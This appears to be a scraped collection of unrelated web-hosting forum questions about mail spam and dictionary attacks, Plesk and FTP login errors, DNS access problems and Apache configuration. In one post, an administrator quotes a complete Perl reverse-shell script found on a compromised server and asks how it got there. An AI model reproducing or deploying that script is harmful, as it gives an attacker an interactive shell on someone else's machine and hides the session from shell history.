I'm running a dedicated server with CentOS 5
Today I open my email logs and I was surprise by what I found!
Logs like this:
Nov 3 17:23:55 warhead vpopmail[5979]: vchkpw-smtp: vpopmail user not found sys@:118.167.19.58
Nov 3 17:23:58 warhead vpopmail[6010]: vchkpw-smtp: vpopmail user not found sys@:118.167.19.58 ...
I'm running a brand new installed VPS with CentOS 6.6 and Plesk 12.0.18. I created a subscription and by default a FTP user is created. However, I cannot login with these credentials. I also created a new user but the same problem presists. I'm 100% sure that the username and password is correct.
Filezilla gives me and 530 Login incorrect. But if I look at the /var/log/secure file, I see this odd message (FTP username = test):
Jan 30 16:01:45 transip proftpd: PAM unable to dlopen(/lib64/security/pam_stack.so): /lib64/security/pam_stack.so: cannot open shared object file: No such file or directory
Jan 30 16:01:45 transip proftpd: PAM adding faulty module: /lib64/security/pam_stack.so
Jan 30 16:01:45 transip proftpd: pam_listfile(proftpd:auth): Couldn't open /etc/ftpusers
Jan 30 16:01:45 transip proftpd[18085]: 127.0.0.1 (x.x.x.x[x.x.x.x]) - USER test (Login failed): No such user found
No such user found, although it is created with Plesk.
RHEL3/Cpanel/Exim
So one of my domains is getting a dictionary attack. It is a popular domain and "big deal" it happens all the time. Well, this time it is the most ruthless distributed dictionary attack I have ever seen.
Today marks the one week period and emails are flooding in 10 to 15 a second (of course none of them ever get delivered). It is like hail pounding on a thin tin roof and the denial/logging alone has the server load at least quadrupled!
Oh yeh, the best part. I have a beautiful list of over 7,000 banned IP addresses (and growing every minute, now THATS DISTRIBUTED!).
We've been seeing sluggish performance on our mail gateways, and so I started doing some digging in the logs. It looks like we are filling up with messages like:
2007-05-16 12:22:16 Connection from [xx.xx.xx.xx] refused: too many connections
We have our max connections set to 20 (total, not host-specific) in exim4. So I started tailing the logs, and sure enough, we are getting bombarded with requests to randomstring@ourdomain.com coming from all over the map. The requests are getting denied of course, but that doesn't help the connection issue since they are consuming all of them, preventing real mail (for the most part) from getting through.
What is the proper way to deal with something like this? I could certainly just up the max connections value from 20 to 40 or 50 or whatever, but I'm not sure what kind of performance impact that will have on the rest of the traffic going through our gateways.
Since the spam attempts are coming from all over the place, it doesn't seem like I can just firewall out a few addresses and be done with it.
This particular rack is a cluster of web and database servers behind two gateway boxes, which handle the mail traffic (so this problem is on the gateways, the actual mail server itself sits behind the gateways and never actually sees these fake emails).
I'm getting a big problem on my server.
From 1 week until now I got 4 spam attacks. The attacker is the same, because the emails sent are iqual.
The technique is also the same, they use an email account (compromissed password) and send emails through smtp server.
When I detect the attack, i do:
1. identify the compromised account
2. Change password from the compromised account
3. Stop qmail
4. Clear queue with qmail-remove
5. Start qmail
The problem is that they already used 4 diferent domains since the first attack. So, here is my problem, how do they discover the passwords?! How can I solve this problem? I have hundreds of emails accounts and can't change it all.
CentOS release 5.10 (Final)
Plesk 11.0.9
I need reinstall qmail after spam atack and follows the post.URL....It says:
rpm -Uvh --force psa-qmail
but my system return an error message..error: opening psa-qmail failed: it does not existe file or directory (error: la apertura de psa-qmail falló: No existe el fichero o el directorio)
rpm -q psa-qmail
return
psa-qmail-1.03-cos5.build1013120126.11
And my system is CentOS
We like to create the mail accounts through php scripts in mywebsite.com website. So we request you to setup the Qmail with Vpopmail server in our server. As we have the following packages are already installed.
1. Qmail
2. Courier POP/IMAP
3. Horde Webmail client
Please install the vpopmail in the ourserver and configure these four packages to create the mail accounts via php script. So that we can use vaddsuer command in php to create the mail ids annd also imap_open commands to access the mails.
Our server is configured with Plesk control panel.
The installation is very urgent, as our website is going live sooner.
I will make the decision sooner and let us know the cost, as it will be given to the provider sooner.
Not by choice but I got a machine running qmail with vpopmail on it. The queue on this thing is ridiculously long and doesn't seem to be getting any smaller due to the large amounts of spam sent to several domains under it.
Most of the spam is coming in the form of a@domain.com aa@domain.com ect. So I figured rather than bounce the mail back to these non existent addresses rather go the route of /dev/null. Now for qmail you'd just do # but seems for vpopmail that does not work.
So my .qmail-default have the following currently:
/usr/local/vpopmail/bin/vdelivermail '' /dev/null
Unfortunately it still sends mail back to the user who sent the mail but it sends it was delivered to /dev/null.
So any suggestions on to get that working and ways to manage this queue a heck of a lot better?
We like to create the mail accounts through php scripts in mywebsite.com website. So we request you to setup the Qmail with Vpopmail server in our server. As we have the following packages are already installed.
1. Qmail
2. Courier POP/IMAP
3. Horde Webmail client
providers who install the vpopmail in the our server and configure these four packages to create the mail accounts via php script. So that we can use vaddsuer command in php to create the mail ids and also imap_open commands to access the mails.
We will take the decision sooner since we need to live the website shortly.
Our server is configured by plesk control panel.
We have see a interesting system from one competitors:
any user that have a email account receive any 24 hours a email report of all spam receive (as html attach)
In this html file there is list and flag and user can be indicate that is NOT a spam and click submit into html file that send information to mail server
May be interesting system
We use exim on ours server and horde as webmail..
i have a vps but there is too much process called mailnull
after that the data centre closed my server for being sent spam
so how i can catch the user sending spam with mailnull?
I facing a serious problem with my qmail and plesk 11.0.9.I found the way spammer did with my server by listening everything on port 25. Maybe he know the RCPT hosts of mine, and they send emails with random username but with domain hosted on my Plesk. (user1@mydomain.com, user2@ my domain.com, ... userxxx@mydomain.com).
qmail only check domain in RCPT if spammer input:"mail from user1@mydomain.com" - (with out ":") - no email address on my server.then server reply: 550, no mailbox here by that name. (#5.7.17)
But qmail check username and domain if spammer input:""mail from: user1@mydomain.com" - (with ":") - no email address on my server. Then server reply: 250 OK..This is really weird! I tried with all my plesk server, this bug still effected.Click to expand...
I thought I knew enough about my .htaccess stuff to do this, but I can't seem to work it out. What I want to do is if a user visits domain.com/folder, we check to see if the folder exists. If so, show as normal (IE domain.com/support)
If a user visits domain.com/dynamicusername (dynamicusername is not a physical folder), redirect to dynamicusername.domain.com
Microsoft Windows Server 2008 R2 Service Pack 1
Panel version 11.0.9 Update #59, last updated at Oct 3, 2013 02:06 AM
MailEnable version 5
I see in the plesk documentation that the screen to enable SPAM filtering for an individual there is an option to "Move spam to the Spam folder". I don't see that option so I am wondering if it is only available on some versions of Plesk, or in combination with certain mail servers. How to make that option available?
when I find the subscription from the admin side of PPA, if I select "Login as user" I've noticed that it is different from actually logging in as the user - for example - "add domain alias" is missing when I login as a customer - but not as an admin... I need my customers to add their own aliases and manage them - how do I add that feature to the client login side?
View 9 Replies View RelatedFound a suspicious script running on a server in /dev/shm
Code:
#!/usr/bin/perl
use IO::Socket;
$system = '/bin/sh';
$ARGC=@ARGV;
print "Connect Back (S) 2007
";
if ($ARGC!=2) {
print "Usage: $0 [Host] [Port]
";
die "Ex: $0 127.0.0.1 2121
";
}
use Socket;
use FileHandle;
socket(SOCKET, PF_INET, SOCK_STREAM, getprotobyname('tcp')) or die print "[-] Unable to Resolve Host
";
connect(SOCKET, sockaddr_in($ARGV[1], inet_aton($ARGV[0]))) or die print "[-] Unable to Connect Host
";
print "[*] Connecting... $ARGV[0]
";
print "[*] Spawning Shell
";
SOCKET->autoflush();
open(STDIN, ">&SOCKET");
open(STDOUT,">&SOCKET");
open(STDERR,">&SOCKET");
system("unset HISTFILE; unset SAVEHIST ;echo;id;uname -a;w");
system($system);
#EOF
Removed it, changed all passwords, etc, anyone know how this might've gotten into /dev/shm? ( CentOS 4.4 )
We were tasked with helping a website owner find all the malscripts on his site and remove them. He, like many, learned that his site was delivering malicious code with an email from Google.
This website owner had tried removing the code himself and yet his site was still blacklisted by Google. This was killing his sales as anyone visiting with Firefox as their browser, or Chrome, were greeted with a big warning:
This site may harm your computer.
After about a week of trying to rectify the problem himself, he contacted us.
He provided us FTP access to his site so we could tackle it.
After downloading his site (which literally took 3 hours) we started scanning. We grep'd for the word "base64_decode" and found over 228 php files all with the following malscript (spaces added to protect the innocent):
Code:....
I have a valid ssl certificate for the website but it still shows address not found error. But sometimes it just works fine.
is it related to dns issue?
I do not know where to post this, I recently changed Hosts.
My domain through GoDaddy was changed to my new account that was setup, The issue is everyone else can see my website but me and I am not sure why?
On my end I get Server Not Found?
I can see my site through a Proxy and also I have shown the site to a few people and they have no issues accessing it...
For the first time after running a server for about a year I decided to buy a new server and in it I found out that there is a some sort of infection in it. What should I do next. The logs are attached in a n attachment.
Attached Files
rootkit.log.txt (9.4 KB, 70 views)
I cant visit my website! <snipped> everytime I go it says server not found. So I told some friends to go and they are able to see and visit <snipped> How is that possible?? They could and I cant? Yesterday same thing but then couple hours later it worked I could visit hmlegends.com but i didnt do anything and now today same thing server not found! i cleaned my history everything and still server not found!
So what I did is used a proxy <snipped> and then it worked!
But then I dont use a proxy SERVER NOT FOUND! Its like my IP cant reach hmlegends.com
I dont know how to solve this?!?? It just says server not found!
But it looks like everyone else could access it!
Anyways im using Firefox 2 but then maybe i thought it was my browser so switched to 3 so currently on firefox 3
and no its not its something with my IP cuz when i use proxy i could go to my site
but point is i dont wanna use proxy i wanna use my IP to go to hmlegends.com
Also im using Dial Up Internet!
I use AOL Dialer to connect!
Aol Dialer 4.8.8.4
I have recently brought a VPS hosting package. At the moment I am going through the tutoritals on the net that I have researched before getting a VPS package to give me some understanding on what I need to do to securior the server and also how to install the software that I require.
For most of today, I have been trying to sort out a problem that I am currently having.
Of which is I am trying to sort out a part of the tutorial from a website that requires the use of apt commands.
But for every command I am getting the message back apt..... Command not found. I am currently using the ubuntu operating system. And through some research, I have got the feeling that I might have the bare installation done on my server to just make it work.
Would I be right, and with the bare installation apt commands wouldn't be installed?
If I am, how would I go about installing the Apt commands and anything else that I might require?
I got a new BOX, i see 'cronjob' not working,
cronjob
-bash: cronjob: command not found
I installed
yum install vixie-cron.i386
Still
cronjob
-bash: cronjob: command not found
# cron
-bash: cron: command not found
how can i get 'cronjob' working?
I upgraded from Apache 1.3.7 to the latest copy
Everything works nicely, except the cgi-bin directory
When a user tries to access a script or even a standard text file, it throws up the error..
Not Found
The requested URL /cgi-bin/first.txt was not found on this server.
Additionally, a 404 Not Found error was encountered while trying to use an ErrorDocument to handle the request.
When they try and access the cgi-bin directory itself, they get
Forbidden
You don't have permission to access /cgi-bin/ on this server
Now, I've checked the httpd.conf file and this is what it has for Cgi-bin
<IfModule alias_module>
ScriptAlias /cgi-bin/ "/usr/local/apache/cgi-bin/"
</IfModule>
<Directory "/usr/local/apache/cgi-bin">
AllowOverride None
Options None
Order allow,deny
Allow from all
</Directory>
And the error logs say..
[Sun Jan 20 18:09:56 2008] [error] [client xx.xx.xx.xx] File does not exist: /home/goewowc/public_html/404.shtml
[Sun Jan 20 18:09:56 2008] [error] [client xx.xx.xx.xx] script not found or unable to stat: /usr/local/apache/cgi-bin/first.txt
The CGI-bin directory is chmodded correctly, the files are also chmodded and belong to the correct group
while am installing some programs there is some problem in my php
PHP GD Module Not Found
how could i install it in SSH root?